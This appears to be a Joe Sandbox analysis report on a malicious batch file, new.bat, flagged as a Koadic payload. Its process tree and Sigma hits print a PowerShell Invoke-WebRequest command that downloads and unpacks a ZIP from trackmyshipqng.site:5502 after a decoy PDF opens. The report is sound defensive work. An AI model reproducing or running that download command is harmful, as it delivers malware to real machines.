Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new.bat

Overview

General Information

Sample name:new.bat
Analysis ID:1500640
MD5:4269b91b4c2c00e8d28345e3cc6cf1a9
SHA1:d4ebd822c7bb237127df4bebd9e176938060286c
SHA256:545687c9f5fcfba81ee854cc83694b5b2e27f9e16e435662b5194d45d07e0f57
Tags:bat
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Found large BAT file
Loading BitLocker PowerShell Module
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Acrobat.exe (PID: 8012 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\DTBZGIOOSO.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7496 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 1868 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2236 --field-trial-handle=1508,i,1077775855205857416,457621313890120960,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • timeout.exe (PID: 8028 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • powershell.exe (PID: 8132 cmdline: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4724 cmdline: powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\DXJS.zip' -DesusertionPath 'C:\Users\user\Downloads' -Force }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 5596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
new.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x59:$s2: :~48,1%%
  • 0x64:$s2: :~17,1%%
  • 0x6f:$s2: :~29,1%%
  • 0x7a:$s2: :~25,1%%
  • 0x85:$s2: :~4,1%%
  • 0x8f:$s2: :~42,1%%
  • 0x9a:$s2: :~4,1%%
  • 0xa4:$s2: :~20,1%%
  • 0xaf:$s2: :~20,1%%
  • 0xc5:$s2: :~32,1%%
  • 0xd0:$s2: :~17,1%%
  • 0xdb:$s2: :~23,1%%
  • 0xe6:$s2: :~13,1%%
  • 0xf1:$s2: :~4,1%%
  • 0xfb:$s2: :~29,1%%
  • 0x106:$s2: :~49,1%%
  • 0x111:$s2: :~13,1%
  • 0x122:$s2: :~42,1%%
  • 0x12d:$s2: :~44,1%%
  • 0x138:$s2: :~30,1%%

System Summary

barindex
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4724, TargetFilename: C:\Users\user\Downloads\Python\Launcher\py.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7888, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", ProcessId: 8132, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7888, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", ProcessId: 8132, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7888, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", ProcessId: 8132, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5596, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.9% probability
Source: Binary string: <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> script file.</p></li> source: 3.2.html.16.dr
Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.run">(pdb.Pdb method)</a> source: genindex-R.html.16.dr
Source: Binary string: <li><p>The <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> class constructor now accepts a <em>nosigint</em> argument.</p></li> source: 3.2.html.16.dr
Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.set_trace">(pdb.Pdb method)</a> source: genindex-S.html.16.dr
Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.runeval">(pdb.Pdb method)</a> source: genindex-R.html.16.dr
Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.runcall">(pdb.Pdb method)</a> source: genindex-R.html.16.dr
Source: Binary string: <li><p>A <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> script file can contain <code class="docutils literal notranslate"><span class="pre">continue</span></code> and <code class="docutils literal notranslate"><span class="pre">next</span></code> commands source: 3.2.html.16.dr
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A0.6.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: test_warning.py.16.drString found in binary or memory: http://bugs.python.org/issue18081).
Source: test_warning.py.16.drString found in binary or memory: http://bugs.python.org/issue18318).
Source: codecs.py.16.drString found in binary or memory: http://bugs.python.org/issue19619
Source: _pydecimal.py.16.drString found in binary or memory: http://bugs.python.org/issue6857.
Source: 2.3.html.16.drString found in binary or memory: http://catb.org/~esr/trove/
Source: svchost.exe, 00000007.00000002.2679153943.000001FB4B800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: transports.cpython-312.pyc.16.drString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
Source: transports.cpython-312.pyc.16.drString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
Source: transports.cpython-312.pyc.16.drString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: svchost.exe, 00000007.00000003.1471535168.000001FB4B670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 2.2.html.16.drString found in binary or memory: http://freshmeat.net/releases/52719/&#39;
Source: heuristics.cpython-312.pyc.16.drString found in binary or memory: http://lxr.mozilla.org/mozilla-release/source/netwerk/protocol/http/nsHttpResponseHead.cpp#397
Source: sslproto.py.16.drString found in binary or memory: http://magic.io
Source: ceval.h.16.drString found in binary or memory: http://mail.python.org/pipermail/python-dev/2008-August/082106.html
Source: powershell.exe, 00000005.00000002.2078895850.0000028A11544000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2078895850.0000028A11687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2036650641.0000028A016F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2036650641.0000028A014D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: _pydecimal.py.16.dr, 2.4.html.16.drString found in binary or memory: http://speleotrove.com/decimal/
Source: _pydecimal.py.16.drString found in binary or memory: http://speleotrove.com/decimal/decarith.html
Source: fetch_macholib.16.drString found in binary or memory: http://svn.red-bean.com/bob/macholib/trunk/macholib/
Source: heuristics.cpython-312.pyc.16.drString found in binary or memory: http://tools.ietf.org/html/rfc7234#section-4.2.2
Source: heuristics.cpython-312.pyc.16.drString found in binary or memory: http://tools.ietf.org/html/rfc7234#section-5.5.4
Source: powershell.exe, 00000005.00000002.2036650641.0000028A016F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trackmyshipqng.site:5502
Source: powershell.exe, 00000005.00000002.2085360779.0000028A7F5B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trackmyshipqng.site:5502/DXJS.zip
Source: powershell.exe, 00000005.00000002.2084105027.0000028A7EEA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2085360779.0000028A7F5B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trackmyshipqng.site:5502/FTSP.zip
Source: powershell.exe, 00000005.00000002.2085243333.0000028A7F0B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2085243333.0000028A7F0B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2083071820.0000028A1985C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2085360779.0000028A7F5B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trackmyshipqng.site:5502/FTSP.zipHOMEDRIVE=C:HOMEPATH=
Source: powershell.exe, 00000005.00000002.2084105027.0000028A7EEA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trackmyshipqng.site:5502/FTSP.zip~
Source: powershell.exe, 00000005.00000002.2085243333.0000028A7F0B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trackmyshipqng.site:5502/dxjs.zip
Source: powershell.exe, 00000005.00000002.2036650641.0000028A016F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2.3.html.16.drString found in binary or memory: http://www.atheos.cx/
Source: _pydatetime.py.16.drString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: _pydatetime.py.16.drString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: 2.2.html.16.drString found in binary or memory: http://www.oreillynet.com/meerkat/xml-rpc/server.php&#39;
Source: 2.3.html.16.drString found in binary or memory: http://www.phyast.pitt.edu/~micheles/mro.html
Source: _pydatetime.py.16.drString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: _markupbase.py.16.drString found in binary or memory: http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf
Source: library.html.16.drString found in binary or memory: http://www.some-server.out-there&#39;
Source: zlib.html.16.drString found in binary or memory: http://www.zlib.net
Source: zlib.html.16.drString found in binary or memory: http://www.zlib.net/manual.html
Source: 2.2.html.16.drString found in binary or memory: http://xmlrpc.scripting.com/
Source: powershell.exe, 00000005.00000002.2036650641.0000028A014D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: mac.html.16.drString found in binary or memory: https://aquamacs.org
Source: argparse.html.16.drString found in binary or memory: https://babel.pocoo.org/
Source: mac.html.16.drString found in binary or memory: https://beeware.org
Source: interactive.html.16.drString found in binary or memory: https://bpython-interpreter.org/
Source: mac.html.16.drString found in binary or memory: https://briefcase.readthedocs.io
Source: selector_events.py.16.drString found in binary or memory: https://bugs.python.org/issue27906
Source: dataclasses.py.16.drString found in binary or memory: https://bugs.python.org/issue32929#msg312829
Source: dataclasses.py.16.drString found in binary or memory: https://bugs.python.org/issue33453
Source: typeobj.html.16.drString found in binary or memory: https://bugs.python.org/issue40217
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10093
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10321
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10518
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10554
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10586
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10593
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10827
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10889
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1286
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1289118
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1537721
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1580
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1655
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1664
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1675951
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1696199
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1739468
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1772833
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1777412
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1818
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=2531
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=2690
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=2706
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=2846
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=2983
Source: intro.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33720
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=3439
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=3445
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=3488
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4136
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4195
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4201
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4258
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4285
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4384
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4617
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4661
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4688
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4707
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4739
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4753
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=477863
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4868
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4910
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4972
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5084
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5094
Source: 3.1.html.16.dr, 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5150
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5175
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5228
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5237
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5506
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5630
Source: 3.1.html.16.dr, 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5675
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5867
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5914
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5975
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=6081
Source: 3.1.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=6137
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=6472
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=6641
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=6856
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=7094
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=7301
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=7418
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=7461
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=7471
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=7610
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=8013
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=8046
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=8188
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=8257
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=8294
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=8413
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=8540
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=8777
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=8806
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=8814
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9110
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9213
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9337
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9425
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9567
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9666
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9757
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9826
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9840
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9862
Source: 3.2.html.16.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9962
Source: _pydatetime.py.16.drString found in binary or memory: https://bugs.python.org/msg352381
Source: 2.3.html.16.drString found in binary or memory: https://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.19.3910
Source: 3.2.html.16.drString found in binary or memory: https://code.activestate.com/recipes/498245/
Source: 3.2.html.16.drString found in binary or memory: https://code.activestate.com/recipes/577479/
Source: library.html.16.drString found in binary or memory: https://code.google.com/archive/p/python-safethread
Source: 3.1.html.16.dr, 3.2.html.16.drString found in binary or memory: https://codereview.appspot.com/53094
Source: powershell.exe, 00000005.00000002.2078895850.0000028A11687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2078895850.0000028A11687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2078895850.0000028A11687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: tkinter.ttk.html.16.drString found in binary or memory: https://core.tcl.tk/tips/doc/trunk/tip/48.md
Source: trace.html.16.drString found in binary or memory: https://coverage.readthedocs.io/
Source: design.html.16.drString found in binary or memory: https://cython.org/
Source: 3.2.html.16.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2047.html
Source: 2.2.html.16.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2104.html
Source: 2.2.html.16.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2342.html
Source: 2.2.html.16.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2487.html
Source: 3.2.html.16.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2616.html
Source: 2.2.html.16.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2822.html
Source: uuid.html.16.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc4122.html
Source: 2.2.html.16.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc822.html
Source: mac.html.16.drString found in binary or memory: https://developer.apple.com/documentation/macos-release-notes/macos-12_3-release-notes#Python
Source: mac.html.16.drString found in binary or memory: https://developer.apple.com/library/archive/qa/qa1067/_index.html
Source: heuristics.cpython-312.pyc.16.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/HTTP/Caching_FAQ
Source: stable.html.16.drString found in binary or memory: https://discuss.python.org/c/core-dev/c-api/30
Source: 2.2.html.16.drString found in binary or memory: https://docs.python.org/2.2/lib/lib.html
Source: 2.2.html.16.drString found in binary or memory: https://docs.python.org/2.2/ref/ref.html
Source: type.html.16.dr, stable.html.16.dr, tty.html.16.dr, zipfile.html.16.dr, index.html7.16.dr, capsule.html.16.dr, xml.sax.utils.html.16.dr, isolating-extensions.html.16.dr, editors.html.16.dr, unittest.mock.html.16.dr, list.html.16.dr, errors.html.16.dr, set.html.16.dr, long.html.16.dr, xmlrpc.server.html.16.dr, zipapp.html.16.dr, exceptions.html.16.dr, wave.html.16.dr, apiabiversion.html.16.dr, library.html.16.dr, utilities.html.16.drString found in binary or memory: https://docs.python.org/3/_static/og-image.png
Source: apiabiversion.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/apiabiversion.html
